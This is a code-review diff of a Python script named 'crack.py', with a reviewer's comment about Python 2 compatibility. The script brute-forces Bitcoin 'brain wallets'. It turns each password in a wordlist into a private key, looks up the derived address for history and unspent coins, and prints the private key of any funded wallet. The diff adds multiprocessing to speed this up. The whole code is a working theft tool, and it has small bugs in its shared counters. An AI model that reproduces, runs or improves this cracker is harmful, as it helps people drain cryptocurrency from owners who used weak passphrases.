crack.py

```diff
@@ -23,54 +30,82 @@ def count_lines(filename):
     return t
 
 
+def crack_process(pwd):
+    """
+    crack_process performs the action of checking to see if a public key addresses
+    can be found that is generated by the password for the private key. For any 
+    addresses that are found to have history, it will also check unspent values 
+    on the address. Updates shared values for tracking existance of addresses matching
+    a password in the list, total balances
+
+    Args:
+        pwd: the plaintext password to find matching public addresses for 
+
+    """
+
+    print("Worker thread for password {}".format(pwd))
+    try:
+        priv = sha256(pwd)
+        pub = privtopub(priv)
+        addr = pubtoaddr(pub)
+        h = history(addr)
+        if h and any(h):
+            with total_exists.get_lock():
+                total_exists += 1
+        
+            print('Found history on address: {}'.format(addr))
+            print('For Passphrase: {}'.format(pwd))
+            
+            u = unspent(addr)
+            if u and any(u):
+                with total_balance.get_lock():
+                    total_balance.value += 1
+        
+                print('BINGO! Found also unspent')
+                print('Private Key: {}'.format(priv))
+                print('Public Key: {}'.format(pub))
+
+    except Exception as e:
+        with total_errors.get_lock():
+            total_errors += 1
+        print('Error on {}'.format(pwd))
+        print(e)
+
+
 def crack(pwd_file):
     print('Using file: {}'.format(pwd_file))
     total = count_lines(pwd_file)
+    
     log_blocks = int(total * 0.0001)
     if log_blocks == 0:
         log_blocks = total
+        
     with open(pwd_file) as fp:
-        count_exists = 0
-        count_balance = 0
-        count_errors = 0
-        for i, pwd in enumerate(fp):
-            try:
-                if i % log_blocks == 0:
-                    print('Progress: {0:.2f}%'.format(float(i) / total * 100.00))
-                if pwd:
-                    priv = sha256(pwd)
-                    pub = privtopub(priv)
-                    addr = pubtoaddr(pub)
-                    h = history(addr)
-                    if h and any(h):
-                        count_exists += 1
-                        print('Found history on address: {}'.format(addr))
-                        print('For Passphrase: {}'.format(pwd))
-                        # print(json.dumps(h, indent=1))
-                        u = unspent(addr)
-                        if u and any(u):
-                            count_balance += 1
-                            print('BINGO! Found also unspent')
-                            print('Private Key: {}'.format(priv))
-                            print('Public Key: {}'.format(pub))
-
-            except Exception, e:
-                count_errors += 1
-                print('Error on {}'.format(pwd))
-                print(e)
-
-    return total, count_exists, count_balance, count_errors
+        with Pool() as pool:
```

Comment:
I'd love to have this python3-compatible. But for me (running on Mac) the underlying library is failing; the error only show up when you have an item that has at least history, otherwise everything seems to work fine. So I think it's safer to stick with python 2 for now.

The multiprocessing idea is great, so if you can adapt it to work with python2 would be awesome.